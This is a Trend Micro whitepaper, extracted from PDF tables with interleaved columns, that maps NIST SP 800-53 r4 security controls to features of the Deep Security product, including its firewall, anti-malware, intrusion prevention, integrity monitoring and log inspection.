sp800 53r4compliancy v2 2
sp800 53r4compliancy v2 2
1
The CC evaluation Security Targets also included Trend Micro product specific Security Functional Requirements (SFRs) and Security Assurance Requirements (SARs) related to
Intrusion Detection and Anti-Malware. These SFRs and SARs are not included in the SP 800-53 r4 Appendix H mapping table.
2
. The current Common Criteria evaluation of Deep Security v9.5 is an update to the earlier evaluations to EAL4+ for Deep Security v7.5 SP2 (Certification Report #383-4-152) and
for Deep Security v8.0 SP1 (Maintenance Report # 383-7-79-MR).
Document TMIC-004-N Version 2.0, September 2015 2
One of the major challenges is for government enterprises and their service providers to remain compliant with the SP 800-53 standard in the constantly
changing threat environment. One objective of this Trend Micro document is to provide focused guidance on how Trend Micro Deep Security can effectively help
deal with these ongoing challenges. The SP 800-53 security control baselines and priorities are leveraged to provide such focus in this guidance. This Prioritized
Approach identifies the applicable SP 800-53 security controls baselines (L, M and H); the implementation priorities (P0, P1, P2, and P4). These details will help
enterprises and their service provider partners implement a continuous improvement process to protect critical assets data against the highest risk factors and
today’s escalating threats. The reader is also referred to the above referenced Trend Micro whitepaper for additional guidance related to virtualization
implementation.
The Deep Security product provides, in both virtualized and physical environments, the combined functionality of a Common Criteria EAL2 validated Firewall,
Anti-Virus, Deep Packet Inspection, Integrity Monitoring, Log Inspection, Role Based Access Control (RBAC) and support for multi-tenant virtual environments.
The primary Deep Security modules include:
Deep Security Manager is a centralized Web-based management console which administrators use to configure security policy and deploy protection to the enforcement
components: the Deep Security Virtual Appliance and the Deep Security Agent.
Firewall Module centralizes management of server firewall policy using a bidirectional stateful firewall. Supports virtual machine zoning and prevents denial of service
attacks. Provides broad coverage for all IP-based protocols and frame types as well as fine-grained filtering for ports and IP and MAC addresses.
Anti-malware Module provides both real-time and on-demand protection against file-based threats, including threats commonly referred to as malware, viruses, Trojans,
and spyware. To identify threats, Anti-Malware checks files against a comprehensive threat database, portions of which are hosted on servers or kept locally as updatable
patterns. Anti-Malware also checks files for certain characteristics, such as compression and known exploit code. To address threats, Anti-Malware selectively performs
actions that contain and remove the threats while minimizing system impact. Anti-Malware can clean, delete, or quarantine malicious files. It can also terminate processes
and delete other system objects that are associated with identified threats.
Recommendation Scans identifies known vulnerabilities. The operation scans the operating system and also installed applications. Recommendation Scans automate
scanning of systems and patch levels against the latest Critical Vulnerability and Exposure (CVE) database, to automatically apply Deep Security signatures, engines,
patterns, and rules/filters to detect/prevent exploitation of these vulnerabilities and to produce audit logs and reports which can be used to support a continuous monitoring
program or audits.
Integrity Monitoring Module detects and reports malicious and unexpected changes to files and systems registry in real time, and is available in agentless form factor.
Provides administrators with the ability to track both authorized and unauthorized changes made to the instance. The ability to detect unauthorized changes is a critical
component in a cloud security strategy as it provides the visibility into changes that could indicate the compromise of an instance.
Log Inspection Module provides visibility into important security events buried in log files. Optimizes the identification of important security events buried in multiple log
entries across the data center. Forwards suspicious events to a SIEM system or centralized logging server for correlation, reporting and archiving. Leverages and
enhances open-source software available at OSSEC.
Intrusion Prevention Module is both an Intrusion Detections System (IDS) and an Intrusion Prevention System (IPS) which protects computers from being exploited by
attacks against known and zero-day vulnerability attacks as well as against SQL injections attacks, cross-site scripting attacks, and other web application vulnerabilities.
Shields vulnerabilities until code fixes can be completed. It identifies malicious software accessing the network and increases visibility into, or control over, applications
accessing the network. Intrusion Prevention prevents attacks by detecting malicious instructions in network traffic and dropping relevant packets.
Web Reputation Module protects against web threats by blocking access to malicious URLs. Deep Security uses Trend Micro's Web security databases from Smart
Protection Network sources to check the reputation of Web sites that users are attempting to access. The Web site's reputation is correlated with the specific Web
reputation policy enforced on the computer. Depending on the Web Reputation Security Level being enforced, Deep Security will either block or allow access to the URL.
AU-6 (1) Audit Review, Analysis, and Reporting / Process Integration P1 Deep Security, Recommendation Scan supports this requirement by allowing
The organization employs automated mechanisms to integrate audit review, analysis, and MH organizations to automate scanning of systems and patch levels against the latest Critical
reporting processes to support organizational processes for investigation and response to CNSSI Vulnerability and Exposure (CVE) database, to automatically apply Deep Security
suspicious activities. rules/filters to detect/prevent exploitation of these vulnerabilities and to produce audit logs
FedRAMP and reports which can be used to support a continuous monitoring program or audits.
Supplemental Guidance:
Organizational processes benefiting from integrated audit review, analysis, and reporting
include, for example, incident response, continuous monitoring, contingency planning, and
Inspector General audits. Related controls: AU-12, PM-7.
AU-6 (5) Audit Review, Analysis, and Reporting / Integration / Scanning and Monitoring P1 Deep Security supports the ability to centrally review and correlate audit data with threat
Capabilities H detection (scanning and monitoring) data, by providing interfaces to either a syslog server
or input directly to an SIEM system to enhance the ability to identify inappropriate or
The organization integrates analysis of audit records with analysis of [Selection (one or CNSSI unusual activity.
more): vulnerability scanning information; performance data; information system
monitoring information; [Assignment: organization-defined data/information collected from The Deep Security, Log Inspection capability provides scanning and visibility into
other sources]] to further enhance the ability to identify inappropriate or unusual activity. important security events buried in log files, and creates audit trails of administrator
activity. Optimizes the identification of important security events buried in multiple log
Supplemental Guidance: entries across the data center. Forwards suspicious events to a SIEM system or
This control enhancement does not require vulnerability scanning, the generation of centralized logging server for correlation, reporting and archiving.
performance data, or information system monitoring. Rather, the enhancement requires
that the analysis of information being otherwise produced in these areas is integrated with
the analysis of audit information. Security Event and Information Management System
tools can facilitate audit record aggregation/consolidation from multiple information system
components as well as audit record correlation and analysis. The use of standardized
audit record analysis scripts developed by organizations (with localized script adjustments,
as necessary) provides more cost-effective approaches for analyzing audit record
information collected. The correlation of audit record information with vulnerability
scanning information is important in determining the veracity of vulnerability scans and
correlating attack detection events with scanning results. Correlation with performance
data can help uncover denial of service attacks or cyber-attacks resulting in unauthorized
use of resources. Correlation with system monitoring information can assist in uncovering
attacks and in better relating audit information to operational situations. Related controls:
AU-12, IR-4, RA-5.
CM-2 (6) Configuration Management / Baseline Configuration / Development and Test The Deep Security solution supports satisfying this requirement through the Integrity
Environments Monitoring, which compares the current condition of a monitored object with an existing
The organization maintains a baseline configuration for information system development baseline. Integrity Monitoring monitors critical system objects such as files, folders, registry
and test environments that is managed separately from the operational baseline entries, processes, services, and listening ports and can assist in developing a systems
configuration. baseline configuration and notifying administrators of any modifications to it.
Supplemental Guidance:
Establishing separate baseline configurations for development, testing, and operational
environments helps protect information systems from unplanned/unexpected events
related to development and testing activities. Separate baseline configurations allow
organizations to apply the configuration management that is most appropriate for each type
of configuration. For example, management of operational configurations typically
emphasizes the need for stability, while management of development/test configurations
requires greater flexibility. Configurations in the test environment mirror the configurations
in the operational environment to the extent practicable so that the results of the testing are
representative of the proposed changes to the operational systems. This control
enhancement requires separate configurations but not necessarily separate physical
environments. Related controls: CM-4, SC-3, SC-7.
CM-6 Configuration Management / Configuration Settings
CM-6 Configuration Management / Configuration Settings P1 The Deep Security solution supports satisfying this requirement through the Integrity
The organization: LMH Monitoring functionality which alerts an administrator of a physical or virtualized
a) Establishes and documents configuration settings for information technology products
environment of modifications to critical security configuration objects. In addition the
CNSSI Deep Security solution has introduced within the virtualized environment hypervisor
employed within the information system using [Assignment: organization-defined FedRAMP
security configuration checklists] that reflect the most restrictive mode consistent with integrity monitoring utilizing Intel TPM/TXT technology to monitor whether the
operational requirements; hypervisor is compromised.
b) Implements the configuration settings; The Recommendation Scanning function that exists within Deep Security Manager
c) Identifies, documents, and approves any deviations from established configuration also supports compliance with this requirement, by creating default policies that can
settings for [Assignment: organization-defined information system components] based be automatically assigned to a new server when it comes online and allowing the
on [Assignment: organization-defined operational requirements]; and system to automatically assign security configuration to existing servers. The goal is
d) Monitors and controls changes to the configuration settings in accordance with to automate configuration of hosts and assign the security policies required to
organizational policies and procedures. protect that server/host.
Supplemental Guidance: As additional information - Deep Security can run Recommendation Scans on
Configuration settings are the set of parameters that can be changed in hardware, computers to identify known vulnerabilities. The operation scans the operating
software, or firmware components of the information system that affect the security posture system and installed applications. Based on what is detected, Deep Security will
and/or functionality of the system. Information technology products for which security- recommend security Rules that should be applied. During a Recommendation Scan,
related configuration settings can be defined include, for example, mainframe computers, Deep Security Agents scan:
servers (e.g., database, electronic mail, authentication, web, proxy, file, domain name), - the operating system,
workstations, input/output devices (e.g., scanners, copiers, and printers), network - installed applications,
components (e.g., firewalls, routers, gateways, voice and data switches, wireless access - the Windows registry,
points, network appliances, sensors), operating systems, middleware, and applications. - open ports,
Security-related parameters are those parameters impacting the security state of - the directory listing,
information systems including the parameters required to satisfy other security control - the file system,
requirements. Security-related parameters include, for example: (i) registry settings; (ii) - running processes and services, and
account, file, directory permission settings; and (iii) settings for functions, ports, protocols, - users.
services, and remote connections. Organizations establish organization-wide configuration For large deployments, Trend Micro recommends managing Recommendations at
settings and subsequently derive specific settings for information systems. The established the Policy level. That is, all computers that are to be scanned should already have a
settings become part of the systems configuration baseline. Common secure Policy assigned to them. This way, an organization can make all rule assignments
configurations (also referred to as security configuration checklists, lockdown and from a single source (the Policy) rather than having to manage individual rules on
hardening guides, security reference guides, security technical implementation guides) individual computers.
provide recognized, standardized, and established benchmarks that stipulate secure
configuration settings for specific information technology platforms/products and Recommendation Scans can be initiated manually or can be a Scheduled Task to
instructions for configuring those information system components to meet operational periodically run scans on specified computers.
requirements. Common secure configurations can be developed by a variety of
organizations including, for example, information technology product developers,
manufacturers, vendors, consortia, academia, industry, federal agencies, and other
organizations in the public and private sectors. Common secure configurations include the
United States Government Configuration Baseline (USGCB) which affects the
implementation of CM-6 and other controls such as AC-19 and CM-7. The Security Content
Automation Protocol (SCAP) and the defined standards within the protocol (e.g., Common
Configuration Enumeration) provide an effective method to uniquely identify, track, and
control configuration settings. OMB establishes federal policy on configuration
requirements for federal information systems. Related controls: AC-19, CM-2, CM-3, CM-
7, SI-4.
Document TMIC-004-N Version 2.0 September 2015 8
NIST SP 800-53 r4 Control Priority & Trend Micro Solution Compliancy
Baselines
CM-6 (1) Configuration Management / Configuration Settings / Automated Central P1 Deep Security supports this requirement through the Integrity Monitoring
Management / Application / Verification H functionality, which alerts an administrator of a physical or virtualized environment of
The organization employs automated mechanisms to centrally manage, apply, and verify CNSSI modifications to critical security configuration objects.
configuration settings for [Assignment: organization-defined information system FedRAMP Recommendations Scans, also support this requirement by allowing organizations to
components]. automate scanning of systems and patch levels against the latest Critical
Vulnerability and Exposure (CVE) database, and to automatically apply Deep
Supplemental Guidance: Related controls: CA-7, CM-4. Security rules/filters to detect/prevent exploitation of the identified vulnerabilities.
CP-2 Contingency Planning / Contingency Plan
CP-2 (6) Contingency Plan / Alternate Processing / Storage Site Deep Security supports satisfying this requirement, specifically in the virtual
The organization plans for the transfer of essential missions and business functions to environment, through the ability of Deep Security policies, rules and filters, which are
alternate processing and/or storage sites with little or no loss of operational continuity and linked with Virtual Machines as they are moved to alternate processing - storage
sustains that continuity through information system restoration to primary processing sites, this ensures the security remains intact after the VM move. The
and/or storage sites. Recommendation Scanning function that exists within Deep Security Manager also
supports compliance with this requirement, by creating default policies that can be
Supplemental Guidance: automatically assigned to a new server when it comes online and allowing the
Organizations may choose to carry out the contingency planning activities in this control system to automatically assign security configuration to existing servers. The goal is
enhancement as part of organizational business continuity planning including, for example, to automate configuration of hosts and assign the security policies(rules) required to
as part of business impact analyses. Primary processing and/or storage sites defined by protect that server/host .
organizations as part of contingency planning may change depending on the
circumstances associated with the contingency (e.g., backup sites may become primary
sites). Related control: PE-12.
IR-4 (2) Incident Handling / Dynamic Reconfiguration Deep Security supports this requirement in its support of VMware's NSX by tagging
The organization includes dynamic reconfiguration of [Assignment: organization-defined infected virtual machines allowing them to be automatically quarantined.
information system components] as part of the incident response capability.
Supplemental Guidance:
Dynamic reconfiguration includes, for example, changes to router rules, access control lists,
intrusion detection/prevention system parameters, and filter rules for firewalls and
gateways. Organizations perform dynamic reconfiguration of information systems, for
example, to stop attacks, to misdirect attackers, and to isolate components of systems, thus
limiting the extent of the damage from breaches or compromises. Organizations include
time frames for achieving the reconfiguration of information systems in the definition of the
reconfiguration capability, considering the potential need for rapid response in order to
effectively address sophisticated cyber threats. Related controls: AC-2, AC-4, AC- 16, CM-
2, CM-3, CM-4.
IR-4 (9) Incident Handling / Dynamic Response Capability Deep Security Recommendation Scan supports this requirement by allowing
The organization employs [Assignment: organization-defined dynamic response organizations to automate scanning of systems and patch levels against the latest
capabilities] to effectively respond to security incidents. Critical Vulnerability and Exposure (CVE) database, to automatically apply Deep
Security rules/filters to detect/prevent exploitation of these vulnerabilities and to
Supplemental Guidance: produce audit logs and reports which can be used to support a continuous monitoring
This control enhancement addresses the deployment of replacement or new capabilities in program or audits.
a timely manner in response to security incidents (e.g., adversary actions during hostile
cyber attacks). This includes capabilities implemented at the mission/business process Deep Security supports this requirement in its support of VMware's NSX by tagging
level (e.g., activating alternative mission/business processes) and at the information system infected virtual machines allowing them to be automatically quarantined.
level. Related control: CP-10.
IR-5 Incident Response / Monitoring
IR-5 Incident Monitoring P1 Deep Security, Deep Security Manager supports this control through its ability to
The organization tracks and documents information system security incidents. LMH produce and distribute incident data and reports as required by an organization's
policies and by the Trend Micro Control Manager, which can track and distribute the
Supplemental Guidance: CNSSI reporting of security incidents detected by Deep Security.
Documenting information system security incidents includes, for example, maintaining
records about each incident, the status of the incident, and other pertinent information
necessary for forensics, evaluating incident details, trends, and handling. Incident
information can be obtained from a variety of sources including, for example, incident
reports, incident response teams, audit monitoring, network monitoring, physical access
monitoring, and user/administrator reports. Related controls: AU-6, IR-8, PE-6, SC-5, SC-7,
SI-3, SI-4, SI-7.
IR-5 (1) Incident Monitoring / Automated Tracking / Data Collection / Analysis P1 Within the Trend Micro services the Smart Protection Network uses a global network
The organization employs automated mechanisms to assist in the tracking of security H of threat intelligence sensors to continually update email, web, and file reputation
incidents and in the collection and analysis of incident information. CNSSI databases in the cloud, identifying and blocking threats in real time before they reach
the organization.
Supplemental Guidance:
Automated mechanisms for tracking security incidents and collecting/analyzing incident Deep Security, Deep Security Manager supports this control through its ability to
information include, for example, the Einstein network monitoring device and monitoring automatically produce and distribute incident data and reports as required by an
online Computer Incident Response Centers (CIRCs) or other electronic databases of organization's policies and by the Trend Micro Control Manager, which can track and
incidents. Related controls: AU-7, IR-4. distribute the reporting of security incidents detected by Deep Security.
SC-7 (11) System and Communications Protection / Boundary Protection / Restrict The Deep Security Firewall rules examine the control information of network packets, and
Incoming Communications Traffic CNSSI determine if a network connection should be allowed. Stateful Configuration filters analyze
The information system only allows incoming communications from [Assignment: each network packet in the context of traffic history, correctness of TCP and IP header
organization-defined authorized sources] routed to [Assignment: organization-defined values, and TCP connection state transitions, manages existing network sessions with great
authorized destinations]. efficiency.
Virtual machine isolation: Allows VM's to be isolated virtual environments, providing virtual
Supplemental Guidance: segmentation without the need to modify virtual switch configurations or network
This control enhancement provides determinations that source and destination address architecture.
pairs represent authorized/allowed communications. Such determinations can be based on
several factors including, for example, the presence of source/destination address pairs in Fine-grained filtering: Firewall rules filter traffic based on source and destination IP address,
lists of authorized/allowed communications, the absence of address pairs in lists of port, MAC address, etc. Different rules can be applied to different network interfaces. For
unauthorized/disallowed pairs, or meeting more general rules for authorized/allowed end-user systems, the firewall is location aware, and is able to limit interface use such that
source/destination pairs. Related control: AC-3. only a single interface can be used at one time.
Security Profiles provide a logical way of replicating security settings to physical or virtual
servers or machines that share similar security requirements.
SC-7 (12) System and Communications Protection / Boundary Protection / Host-Based The Deep Security solution provides host based boundary protection through the host
Protection CNSSI application stateful inspection firewall, through the host deep packet inspection, and through
The organization implements [Assignment: organization-defined host-based boundary FedRAMP web reputation services. This can be implemented at the server or workstation level in the
protection mechanisms] at [Assignment: organization-defined information system physical or virtual environments.
components].
Supplemental Guidance:
Host-based boundary protection mechanisms include, for example, host-based firewalls.
Information system components employing host-based boundary protection mechanisms
include, for example, servers, workstations, and mobile devices.
SC-7 (16) System and Communications Protection / Boundary Protection / Prevent The Deep Security solution through the functionality of "Reconnaissance Detection" can
Discovery of Components / Devices determine and advise if an external entity is attempting to discover specific system
The information system prevents discovery of specific system components composing a components or weaknesses associated with them.
managed interface. Smart rules provide broad protection, and low-level insight, for servers and end-user
systems. For operating systems and applications, the rules limit variations of elements of
Supplemental Guidance: traffic, limiting the ability of attackers to investigate possible attack vectors since many
This control enhancement protects network addresses of information system components attacks are based on exceeding expected characteristics. For servers and end-user
that are part of managed interfaces from discovery through common tools and techniques systems, smart rules also provide insight into application activity and unexpected traffic
used to identify devices on networks. Network addresses are not available for discovery (HTTP on an unexpected port, use of a web browser on a server, etc)
(e.g., network address not published or entered in domain name systems), requiring prior
knowledge for access. Another obfuscation technique is to periodically change network
addresses.
SC-7 (17) System and Communications Protection / Boundary Protection / Automated The Deep Packet Inspection module is available in both the Deep Security Agent and Deep
Enforcement of Protocol Formats Security Appliance for VMware ESX/ESXi.
The information system enforces adherence to protocol formats. Deep Packet Inspection provides an automated IDS/IPS capability, which protects operating
Supplemental Guidance: systems, commercial off-the-shelf applications, and custom web applications against attacks
Information system components that enforce protocol formats include, for example, deep such as SQL injection and cross-site scripting.
packet inspection firewalls and XML gateways. Such system components verify adherence Security updates that provide protection against newly discovered vulnerabilities are
to protocol formats/specifications (e.g., IEEE) at the application layer and identify significant automatically delivered to host machines.
vulnerabilities that cannot be detected by devices operating at the network or transport Detailed event records are produced, which provide valuable information, including the
layers. Related control: SC-4. source of the attack, the time, and what the potential intruder was attempting to exploit.
SC-7 (19) System and Communications Protection / Boundary Protection / Blocks The Deep Security Firewall Rules examine the control information of network packets, and
Communication From Non-Organizationally Configured Hosts determine if a network connection should be allowed. Stateful Configuration filters analyze
The information system blocks both inbound and outbound communications traffic between each network packet in the context of traffic history, correctness of TCP and IP header
[Assignment: organization-defined communication clients] that are independently values, and TCP connection state transitions, manages existing network sessions with great
efficiency.
configured by end users and external service providers.
Supplemental Guidance:
Communication clients independently configured by end users and external service
providers include, for example, instant messaging clients. Traffic blocking does not apply to
communication clients that are configured by organizations to perform authorized functions.
SC-7 (20) System and Communications Protection / Boundary Protection / Dynamic The Deep Security firewall as an EAL2 mechanism can be used to create the implied Trust
Isolation / Segregation Zone architectures in a physical and virtualized environment through the use of the Deep
The information system provides the capability to dynamically isolate/segregate Security Virtualized Appliance.
[Assignment: organization-defined information system components] from other Deep Security supports this requirement by its support of VMware's NSX, tagging infected
components of the system. virtual machines and allowing them to be automatically quarantined.
Supplemental Guidance:
The capability to dynamically isolate or segregate certain internal components of
organizational information systems is useful when it is necessary to partition or separate
certain components of dubious origin from those components possessing greater
trustworthiness. Component isolation reduces the attack surface of organizational
information systems. Isolation of selected information system components is also a means
of limiting the damage from successful cyber attacks when those attacks occur.
SI-3 (2) System and Information Integrity / Malicious Code Protection / Automatic Updates P1 Deep Security performs real-time, scheduled, and on-demand scans for file-based viruses
The information system automatically updates malicious code protection mechanisms. MH based upon known signatures and to automatically update and apply Deep Security
signatures, engines, patterns, and rules/filters to detect/prevent exploitation of these
Supplemental Guidance: CNSSI vulnerabilities and to produce reports which can be used to support continuous
Malicious code protection mechanisms include, for example, signature definitions. Due to FedRAMP monitoring.
information system integrity and availability concerns, organizations give careful
consideration to the methodology used to carry out automatic updates. Related control: SI- TrendLabs' carries out all virus research and case analysis for Trend Micro and its
8. customers. It designs and tests virus pattern files and refines the scan engine to keep
Trend Micro technology up to date and effective against the latest threats. During virus
outbreaks, TrendLabs implements strict "Red Alert" escalation procedures to notify users
and produce cures as quickly as possible. Trend Micro's virus doctors usually develop an
initial "fix" for a major new virus in 45 minutes or less, which can be distributed through the
active updates mechanism. TrendLabs also educates users about security threats and
promotes safe computing by compiling virus definitions and other useful information on the
company's web site.
SI-3 (4) System and Information Integrity / Malicious Code Protection / Updates Only by The Deep Security Manager controls all updates to the Deep Security system, which
Privileged Users control anti virus or malicious code intrusion detection and prevention mechanism. Only
The information system updates malicious code protection mechanisms only when directed users with escalated privileges can access the Deep Security Manager.
by a privileged user.
Supplemental Guidance:
This control enhancement may be appropriate for situations where for reasons of security
or operational continuity, updates are only applied when selected/approved by designated
organizational personnel. Related controls: AC-6, CM-5.
SI-3 (7) System and Information Integrity / Malicious Code Protection / Nonsignature- The Deep Security solution implements within the anti virus and deep packet
Based Detection FedRAMP inspection functionality heuristic techniques to compliment the signature based
The information system implements nonsignature-based malicious code detection techniques more commonly used.
mechanisms.
Supplemental Guidance:
Nonsignature-based detection mechanisms include, for example, the use of heuristics to
detect, analyze, and describe the characteristics or behavior of malicious code and to
provide safeguards against malicious code for which signatures do not yet exist or for
which existing signatures may not be effective. This includes polymorphic malicious code
(i.e., code that changes signatures when it replicates). This control enhancement does not
preclude the use of signature-based detection mechanisms.
SI-3 (8) System and Information Integrity / Malicious Code Protection / Detect Deep Security can prevent the execution of malicious commands, file or actions.
Unauthorized Commands The Deep Security solution implements deep packet inspection functionality to
The information system detects [Assignment: organization-defined unauthorized operating determine when suspect commands are being received by the targeted physical or
system commands] through the kernel application programming interface at [Assignment: virtual machine. In the event that a suspicious activity or series of commands are
issued an alert is sent to the Deep Security Manager or the SEIM system to inform
organization-defined information system hardware components] and [Selection (one or the systems administrator of the security event taking place. Further, the
more): issues a warning; audits the command execution; prevents the execution of the implementation of the Deep Security Integrity Monitoring supports satisfying this
command]. requirement through ensuring that configuration files and specific commands have
Supplemental Guidance: not been modified prior to execution.
This control enhancement can also be applied to critical interfaces other than kernel-based
interfaces, including for example, interfaces with virtual machines and privileged
applications. Unauthorized operating system commands include, for example, commands
for kernel functions from information system processes that are not trusted to initiate such
commands, or commands for kernel functions that are suspicious even though commands
of that type are reasonable for processes to initiate.
Organizations can define the malicious commands to be detected by a combination of
command types, command classes, or specific instances of commands. Organizations can
define hardware components by specific component, component type, location in the
network, or combination therein. Organizations may select different actions for different
types/classes/specific instances of potentially malicious commands. Related control: AU-6.
SI-3 (10) System and Information Integrity / Malicious Code Protection / Malicious Code Deep Security supports satisfying this requirement through real-time, scheduled,
Analysis CNSSI and on-demand scans for file-based viruses and malware based upon known
The organization: signatures. Deep Security performs scheduled scans at the time and frequency
a) Employs [Assignment: organization-defined tools and techniques] to analyze the
configured by the authorized administrator. This functionality is supported by the
characteristics and behavior of malicious code; and Trend Micro Smart Protection Network for malware analysis, which provides a
response to the continuous emergence of new threats. New threats are created at a
b) Incorporates the results from malicious code analysis into organizational incident
response and flaw remediation processes. rate of 1.5 every second, historically methods required virus signature files, which
would then have to be delivered to the premises equipment. This caused network
Supplemental Guidance: loads, memory usage, and system loads to gradually increase daily.
The application of selected malicious code analysis tools and techniques provides The Trend Micro Smart Protection Network works by storing the information
organizations with a more in-depth understanding of adversary tradecraft (i.e., tactics, required for security countermeasures in a cloud database rather than on individual
techniques, and procedures) and the functionality and purpose of specific instances of computers and Trend Micro then carries out updates and management via the
malicious code. Understanding the characteristics of malicious code facilitates more cloud. Therefore, a long-term reduction in work and system loads produced by
effective organizational responses to current and future threats. delivering virus signature files is eliminated while simultaneously providing greater
Organizations can conduct malicious code analyses by using reverse engineering security countermeasures.
techniques or by monitoring the behavior of executing code.
The Trend Micro Smart Protection Network uses a global network of threat
intelligence sensors to continually update email, web, and file reputation databases
in the cloud, identifying and blocking threats in real time before they reach the
organization requiring the protection.
SI-4 (3) System and Information Integrity / Information System Monitoring / Automated Deep Security, Log Inspection module monitors specified log files in real time and
Tool Integration reacts to changes to the files as they occur.
The organization employs automated tools to integrate intrusion detection tools into access Deep Security, Intrusion Prevention automatically delivers rules that shield newly
control and flow control mechanisms for rapid response to attacks by enabling discovered vulnerabilities within hours, and can be pushed out to thousands of
reconfiguration of these mechanisms in support of attack isolation and elimination. servers in minutes, without a system reboot.
SI-4 (4) System and Information Integrity / Information System Monitoring /Inbound and P1 The Deep Security deep packet inspection engine intelligently examines the content
Outbound Communications Traffic MH of network traffic entering and leaving hosts. The traffic is inspected for protocol
The information system monitors inbound and outbound communications traffic CNSSI deviations, content that signals an attack, or policy violations. Intrusion Prevention
[Assignment: organization-defined frequency] for unusual or unauthorized activities or protects operating systems, commercial off-the-shelf applications, and custom web
FedRAMP applications against attacks such as SQL injection and cross-site scripting. Detailed
conditions. events provide valuable information, including the source of the attack, the time, and
Supplemental Guidance: what the potential intruder was attempting to exploit.
Unusual/unauthorized activities or conditions related to information system inbound and
outbound communications traffic include, for example, internal traffic that indicates the
presence of malicious code within organizational information systems or propagating
among system components, the unauthorized exporting of information, or signaling to
external information systems. Evidence of malicious code is used to identify potentially
compromised information systems or information system components.
SI-4 (5) System and Information Integrity / Information System Monitoring / System - P1 Deep Security supports this control through its ability to automatically produce and
Generated Alerts MH distribute alerts and reports as required by an organization's policies. Deep Security
The information system alerts [Assignment: organization-defined personnel or roles] when CNSSI Alerts are raised when situations occur that require special attention. Alerts can be
the following indications of compromise or potential compromise occur: [Assignment: raised due to security Events such as the detection of malware or an abnormal restart
FedRAMP on a protected computer, or they can be system events like the Deep Security
organization- defined compromise indicators]. Manager running low on disk space. Deep Security can be configured to send email
Supplemental Guidance: notifications when specific Alerts are raised.
Alerts may be generated from a variety of sources, including, for example, audit records or
inputs from malicious code protection mechanisms, intrusion detection or prevention
mechanisms, or boundary protection devices such as firewalls, gateways, and routers.
Alerts can be transmitted, for example, telephonically, by electronic mail messages, or by
text messaging. Organizational personnel on the notification list can include, for example,
system administrators, mission/business owners, system owners, or information system
security officers. Related controls: AU-5, PE-6.
SI-4 (7) System and Information Integrity / Information System Monitoring / Automated Deep Security supports these controls by:
Response to Suspicious Events - Providing notifications and use, when in the InLine mode, the Detect Mode or Prevent
The information system notifies [Assignment: organization-defined incident response Mode. In Detect Mode, traffic that would normally be dropped will generate events but
personnel (identified by name and/or by role)] of detected suspicious events and takes will be allowed to pass. In the Prevent Mode, Intrusion Prevention rules are applied to
[Assignment: organization-defined least-disruptive actions to terminate suspicious events] traffic and related log events are generated;
- Generating via the Deep Security Agent and the Deep Security Manager; diagnostic
Supplemental Guidance: packages to support the testing of intrusion monitoring tools; and
Least-disruptive actions may include, for example, initiating requests for human responses. - Using Log Inspection to forwards suspicious events to a SIEM system or centralized
logging server for correlation, reporting and archiving.
SI-4 (9) System and Information Integrity / Information System Monitoring / Testing of
Monitoring Tools
The organization tests intrusion-monitoring tools [Assignment: organization-defined
frequency].
Supplemental Guidance:
Testing intrusion-monitoring tools is necessary to ensure that the tools are operating
correctly and continue to meet the monitoring objectives of organizations. The frequency of
testing depends on the types of tools used by organizations and methods of deployment.
Related control: CP-9.
SI-4 (11) System and Information Integrity / Information System Monitoring / Analyze
Communications Traffic Anomalies CNSSI
The organization analyzes outbound communications traffic at the external boundary of the
information system and selected [Assignment: organization-defined interior points within the
system (e.g., subnetworks, subsystems)] to discover anomalies.
Supplemental Guidance:
Anomalies within organizational information systems include, for example, large file
transfers, long- time persistent connections, unusual protocols and ports in use, and
attempted communications with suspected malicious external addresses.
SI-4 (12) System and Information Integrity / Information System Monitoring / Automated
Alerts CNSSI
The organization employs automated mechanisms to alert security personnel of the
following inappropriate or unusual activities with security implications: [Assignment:
organization- defined activities that trigger alerts].
Supplemental Guidance:
This control enhancement focuses on the security alerts generated by organizations and
transmitted using automated means. In contrast to the alerts generated by information
systems in SI-4 (5), which tend to focus on information sources internal to the systems
(e.g., audit records), the sources of information for this enhancement can include other
entities as well (e.g., suspicious activity reports, reports on potential insider threats).
Related controls: AC-18, IA-3.
SI-4 (13) System and Information Integrity / Information System Monitoring / Analyze Deep Security, Intrusion Prevention is a high-performance deep packet inspection
Traffic / Event Patterns engine, which intelligently examines the content of network traffic entering and
The organization: leaving hosts. The traffic is inspected for protocol deviations, content that signals an
a) Analyzes communications traffic/event patterns for the information system;
attack, or policy violations. Intrusion Prevention protects operating systems,
commercial off-the-shelf applications, and custom web applications against attacks
b) Develops profiles representing common traffic patterns and/or events; and
such as SQL injection and cross-site scripting. Detailed events provide valuable
c) Uses the traffic/event profiles in tuning system-monitoring devices to reduce the
information, including the source of the attack, the time, and what the potential
number of false positives and the number of false negatives. intruder was attempting to exploit.
Deep Security, Web Reputation module implements security levels, which determine
whether Deep Security will allow or block access to a URL. For example, if a security
level is set to Low, Deep Security will only block URLs that are known to be Web
threats. As the security level is set higher, the Web threat detection rate improves but
the possibility of false positives also increases.
Deep Security, Log Inspection module monitors specified log files in real time and
reacts to changes to the files as they occur.
SI-4 (15) System and Information Integrity / Information System Monitoring / Wireless to Deep Security Firewall rules for wireless laptops partially support compliance to this
Wireline Communications CNSSI requirement. With many laptops now capable of connecting to both the wired and
The organization employs an intrusion detection system to monitor wireless wireless networks, users need to be aware of the problems that can result from this
communications traffic as the traffic passes from wireless to wireline networks. scenario. The common problem is a "network bridge" configured between the wired
and wireless network. There is a risk of forwarding the internal traffic externally and
Supplemental Guidance: Related control: AC-18. potentially expose internal hosts to external attacks. Deep Security allows
administrators to configure a set of firewall rules for these types of users to prevent
them from creating a network bridge.
SI-4 (23) System and Information Integrity / Information System Monitoring / Host-Based Deep Security is a host based protection solution, in the physical and virtualized
Devices CNSSI environments, providing complete information system monitoring through the
The organization implements [Assignment: organization-defined host-based monitoring FedRAMP functionality associated with DPI, Firewall, Anti-Virus, Integrity Monitoring, and Log
mechanisms] at [Assignment: organization-defined information system components]. Inspection, as described in SI-4
Supplemental Guidance:
Information system components where host-based monitoring can be implemented include,
for example, servers, workstations, and mobile devices. Organizations consider employing
host-based monitoring mechanisms from multiple information technology product
developers.
SI-4 (24) System and Information Integrity / Information System Monitoring / Indicators of Deep Security through the Integrity Monitoring capability detects and reports
Compromise malicious and unexpected changes to files and systems registry in real time.
The information system discovers, collects, distributes, and uses indicators of compromise. Provides administrators with the ability to track both authorized and unauthorized
Supplemental Guidance: changes (IOC) made to the instance. The ability to detect unauthorized changes is a
Indicators of compromise (IOC) are forensic artifacts from intrusions that are identified on critical component as it provides the visibility into changes that could indicate the
organizational information systems (at the host or network level). IOCs provide compromise of an instance.
organizations with valuable information on objects or information systems that have been
